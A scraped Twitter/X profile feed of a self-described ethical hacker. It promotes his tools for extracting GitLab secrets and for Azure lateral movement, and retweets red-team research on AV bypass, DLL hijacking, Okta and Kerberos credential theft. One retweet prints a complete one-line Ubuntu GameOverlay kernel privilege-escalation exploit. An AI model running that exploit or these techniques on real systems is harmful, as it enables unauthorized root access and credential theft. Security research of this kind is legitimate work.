Roy Rahamim

879 posts

Roy Rahamim

Roy Rahamim

@0xRoyR

Ethical Hacker

United States Katılım Şubat 2022
183 Takip Edilen20 Takipçiler
Sabitlenmiş Tweet
Roy Rahamim
Roy Rahamim@0xRoyR·
Happy to introduce KinGit! Got credentials for gitlab account in the organization? Use this tool to extract all kinds of secrets from every available project - fast and easy! github.com/0xRoyR/KinGit
English
0
0
1
135
Roy Rahamim
Roy Rahamim@0xRoyR·
🚨 MCP is everywhere lately. As AI & Agents become part of daily life, this protocol matters — but it also carries familiar security risks. In my latest post I break down MCP Servers & show how these risks are real, with a demo of a vulnerability I found: CVE-2025-58358 🔒 medium.com/p/the-backend-… #CVE #mcp #CyberSec
English
0
0
3
90
Daniel Shaulov
Daniel Shaulov@DanielShaulov01·
If you're wondering - when you click one of these links, it opens using the last logged-on user's context (if they still have a session). The responsible process is LockApp.exe, which runs per logged-in user and stays suspended when their session is active but the PC is locked.🧵
Daniel Shaulov tweet media
English
2
0
2
616
Roy Rahamim
Roy Rahamim@0xRoyR·
Super excited to release Glibby! This is a new tool designed to automate exploiting misconfigurations and performing lateral movement on Azure. Enjoy the tool, more big things are coming soon!!! github.com/0xRoyR/Glibby #Azure #redteam #PenTest
English
0
1
2
93
Roy Rahamim retweetledi
Grzegorz Tworek
Grzegorz Tworek@0gtweet·
By-design AV bypass with "dev drive" 😅 I really like this feature! Update your detection rules if you want to spot this...
Grzegorz Tworek tweet media
English
12
242
907
242.2K
Roy Rahamim retweetledi
Elliot
Elliot@ElliotKillick·
Perfect DLL Hijacking: It's now possible with the latest in security research. Building on previous insights from @NetSPI, we reverse engineer the Windows library loader to disable the infamous Loader Lock and achieve ShellExecute straight from DllMain. 🔍 Link in bio 🔗
Elliot tweet media
English
14
291
804
119.1K
Roy Rahamim retweetledi
Dylan Tran
Dylan Tran@d_tranman·
Dug into call stacks spoofing for the past few months and wrote something. Hopefully this is helpful. dtsec.us/2023-09-15-Sta…
English
9
109
315
50K
Roy Rahamim retweetledi
Adam Chester 🏴‍☠️
My Okta for Red Teamers post is up! We look at how Kerberos SSO works, how to intercept credentials via a fake AD Agent, decrypting AD Agent tokens, adding skeleton key's, and even how to deploy a janky SAML IdP server to auth as any user for good measure. trustedsec.com/blog/okta-for-…
English
24
372
910
98.5K
Roy Rahamim retweetledi
SpecterOps
SpecterOps@SpecterOps·
Happy BloodHound Community Edition release day to all that celebrate! 🥳 Read @_wald0’s blog post on the new features. ghst.ly/45lmyQG
English
3
91
202
19K
Roy Rahamim retweetledi
liad eliyahu
liad eliyahu@liadeliyahu·
Exploit is so easy it fits in a tweet🔥 unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
liad eliyahu tweet media
sagitz@sagitz_

We found two 0-day vulnerabilities in @Ubuntu kernel and it all started by reading descriptions of old CVEs 📖 Thread about the discovery of #GameOverlay 🧵👇🏼

English
11
273
882
155.5K
Roy Rahamim retweetledi
Grzegorz Tworek
Grzegorz Tworek@0gtweet·
Kerberos tickets dumping in pure PowerShell 😍 I simply love such approach. So much more beautiful than loading pre-compiled binary blob. And so much harder to detect... linkedin.com/posts/mzhmo_hi…
English
3
194
558
46.6K